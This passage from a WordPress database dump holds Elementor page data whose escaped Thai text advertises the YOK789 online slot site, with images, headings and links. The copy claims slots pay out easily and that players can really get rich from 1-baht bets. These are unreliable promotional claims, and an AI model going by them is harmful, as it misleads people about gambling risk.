400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2472,335,'_thumbnail_id','273'),(2473,335,'_elementor_edit_mode','builder'),(2474,335,'_elementor_template_type','wp-page'),(2475,335,'_elementor_version','3.35.5'),(2476,335,'_elementor_pro_version','3.32.3'),(2477,335,'_wp_page_template','default'),(2478,335,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2479,335,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><h3><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/h3><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 